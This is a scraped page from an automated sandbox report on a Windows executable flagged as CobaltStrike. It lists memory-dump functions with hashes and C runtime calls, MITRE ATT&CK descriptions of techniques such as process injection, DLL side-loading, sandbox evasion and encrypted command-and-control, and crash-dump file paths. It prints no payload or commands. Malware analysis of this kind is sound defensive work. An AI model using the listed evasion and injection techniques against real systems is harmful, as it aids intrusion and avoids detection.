Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: clock
String ID:
API String ID: 3195780754-0
Opcode ID: 7862a7d32f1c9ad9b973ef17a076326fdf486dc74a254423f992730849a2d722
Instruction ID: 2036b4ff726177994d3b5ea958b35c7d67ea0a0779227ea1d624ef5c87b215ce
Opcode Fuzzy Hash: 7862a7d32f1c9ad9b973ef17a076326fdf486dc74a254423f992730849a2d722
Instruction Fuzzy Hash: 3221D43140C7484AE768ADD8D442AAEBBE0EF95351F55027DECCA83243F594AC4282C7

Function 000001EA846B9A98 Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001EA846B9ABC

Part of subcall function 000001EA846AC7E0: _getptd.LIBCMT ref: 000001EA846AC7F6
Part of subcall function 000001EA846AC7E0: __updatetlocinfo.LIBCMT ref: 000001EA846AC82B
Part of subcall function 000001EA846AC7E0: __updatetmbcinfo.LIBCMT ref: 000001EA846AC852

_errno.LIBCMT ref: 000001EA846B9AC8

Part of subcall function 000001EA846ABFD0: _getptd_noexit.LIBCMT ref: 000001EA846ABFD4

_invalid_parameter_noinfo.LIBCMT ref: 000001EA846B9AD3
strchr.LIBCMT ref: 000001EA846B9AE9

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
String ID:
API String ID: 4151157258-0
Opcode ID: 6fcaa51569f33512e2090195287e243e2f4399f94586e7a5485698e02a016b7c
Instruction ID: 6cbd935a7dfe692fa69b79db62b70e08689c86b7ae79b534bcfd3e98f85367ab
Opcode Fuzzy Hash: 6fcaa51569f33512e2090195287e243e2f4399f94586e7a5485698e02a016b7c
Instruction Fuzzy Hash: 842106705186E88FE7A4D628C4C4BBE76F0FF4535BF8402FDA886C71D1D96098499242

Function 000001EA846A83D0 Relevance: 5.4, APIs: 4, Instructions: 378COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001EA846A8443
malloc.LIBCMT ref: 000001EA846A8667
malloc.LIBCMT ref: 000001EA846A8765

Part of subcall function 000001EA846ABA74: _getptd.LIBCMT ref: 000001EA846ABA93

free.LIBCMT ref: 000001EA846A874D

Part of subcall function 000001EA846A979C: _errno.LIBCMT ref: 000001EA846A97BC

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: malloc$_errno_getptdfree
String ID:
API String ID: 3172138858-0
Opcode ID: d0a27817efde19c6f8d87261e0c14dccd853f4b6914fa58adb41ed9447b39478
Instruction ID: 4fd16c3cca06dd69d3e656c5c8990a947ab58b9792608a110dbd9ca946746e2f
Opcode Fuzzy Hash: d0a27817efde19c6f8d87261e0c14dccd853f4b6914fa58adb41ed9447b39478
Instruction Fuzzy Hash: 40C1A830614F448FF769DB18E841BA973F1FB56312FA445BED946C31A1DA34A8439B83

Function 000001EA846A9DC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001EA846A9E11

Part of subcall function 000001EA846ABFD0: _getptd_noexit.LIBCMT ref: 000001EA846ABFD4

_invalid_parameter_noinfo.LIBCMT ref: 000001EA846A9E1C

Strings

B, xrefs: 000001EA846A9E48

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID: B
API String ID: 1812809483-1255198513
Opcode ID: 6354dd7fc53b9600f59efb332da70efbe254211307fc8429e275f3790f02590a
Instruction ID: ce9a7cf918a5e19cf4196825b9a5e9497fb27cd892f5e71b3e740171f1663d98
Opcode Fuzzy Hash: 6354dd7fc53b9600f59efb332da70efbe254211307fc8429e275f3790f02590a
Instruction Fuzzy Hash: 1311B630218F488FD754EF58D485BAA77E1FF98329F6047AEA419C3291CB74D844C782

Function 000001EA846A7898 Relevance: 5.2, APIs: 4, Instructions: 226COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001EA846A78CC

Part of subcall function 000001EA846A97DC: _FF_MSGBANNER.LIBCMT ref: 000001EA846A980C
Part of subcall function 000001EA846A97DC: _NMSG_WRITE.LIBCMT ref: 000001EA846A9816
Part of subcall function 000001EA846A97DC: _callnewh.LIBCMT ref: 000001EA846A984A
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9855
Part of subcall function 000001EA846A97DC: _errno.LIBCMT ref: 000001EA846A9860

free.LIBCMT ref: 000001EA846A7A13
free.LIBCMT ref: 000001EA846A7A77
free.LIBCMT ref: 000001EA846A7A83

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: dd038f529a1152db983726e88818db10f6b0a149fc053e6d5e168077c86b9374
Instruction ID: 0ea6ef8fb56220b33f4ddd49bc7bc6defa9875b49f0b73bc7f960609dced1497
Opcode Fuzzy Hash: dd038f529a1152db983726e88818db10f6b0a149fc053e6d5e168077c86b9374
Instruction Fuzzy Hash: F3618534218F484BEB59EB28D481BED73E1EF94312F9009BDE94AC3187DE24E9465793

Function 000001EA8469D208 Relevance: 5.2, APIs: 4, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 000001EA8469D2A5

Part of subcall function 000001EA846A9B9C: _errno.LIBCMT ref: 000001EA846A9BD3
Part of subcall function 000001EA846A9B9C: _invalid_parameter_noinfo.LIBCMT ref: 000001EA846A9BDE

_snprintf.LIBCMT ref: 000001EA8469D2C1
_snprintf.LIBCMT ref: 000001EA8469D337
_snprintf.LIBCMT ref: 000001EA8469D34E

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID:
API String ID: 3442832105-0
Opcode ID: fc51f4615cf0e27a482f6b22ff4d87c06e4feeef8bc37e62b75beb2dd9a3da3a
Instruction ID: dbaeb7e86a5d44541090e882c0987b29afbfa7078c57192b9e5e93ea17f149e5
Opcode Fuzzy Hash: fc51f4615cf0e27a482f6b22ff4d87c06e4feeef8bc37e62b75beb2dd9a3da3a
Instruction Fuzzy Hash: 5D618430518A888FEB44EF54D885BEE77F5FB98306F40457ED84AC3192DB78E9458B82

Function 000001EA84693300 Relevance: 5.2, APIs: 4, Instructions: 179COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001EA84693363

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 0ccdd68a0240799a77ae4be0c48a7008bd312d06eef73861b9d961f3f66470dc
Instruction ID: 11eeaee42fab39a1f269ee39cafb16d47200ab90cd1548391f2f2a047fc15406
Opcode Fuzzy Hash: 0ccdd68a0240799a77ae4be0c48a7008bd312d06eef73861b9d961f3f66470dc
Instruction Fuzzy Hash: 3851C930218B854BDB59DE6CD441AAD37E1FF99301F9445BEDC4BC3286EE64EC424642

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report O6O7O5REot.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: CobaltStrike

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_O6O7O5REot.exe_96784ee68f26aa982fc83554df0767665a575b_bbec5281_a491f4d0-9a5e-415e-974f-2768cf823592\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB918.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9C5.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9F5.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Windows Analysis Report
O6O7O5REot.exe

Function 000001EA846A2FA8 Relevance: 4.7, APIs: 3, Instructions: 190
stringCOMMONLIBRARYCODE

Function 000001EA8469FC3E Relevance: 1.7, APIs: 1, Instructions: 211
COMMON

Function 000001EA8469D570 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103
networkCOMMONLIBRARYCODE

Function 000001EA8469CCD4 Relevance: 6.2, APIs: 4, Instructions: 239
networkCOMMONLIBRARYCODE

Function 000001EA846B2E20 Relevance: 4.6, APIs: 3, Instructions: 112
COMMONLIBRARYCODE

Function 000001EA8469D054 Relevance: 3.2, APIs: 2, Instructions: 157
networkCOMMONLIBRARYCODE

Function 000001EA846A5FA4 Relevance: 1.3, APIs: 1, Instructions: 61
COMMONLIBRARYCODE

Function 00007FF76B8714D0 Relevance: .0, Instructions: 4
COMMON

Function 000001EA846B117C Relevance: 16.6, APIs: 11, Instructions: 108
COMMONLIBRARYCODE

Function 000001EA846B1F68 Relevance: 15.1, APIs: 10, Instructions: 93
COMMONLIBRARYCODE

Function 000001EA846B1DF0 Relevance: 15.1, APIs: 10, Instructions: 89
COMMONLIBRARYCODE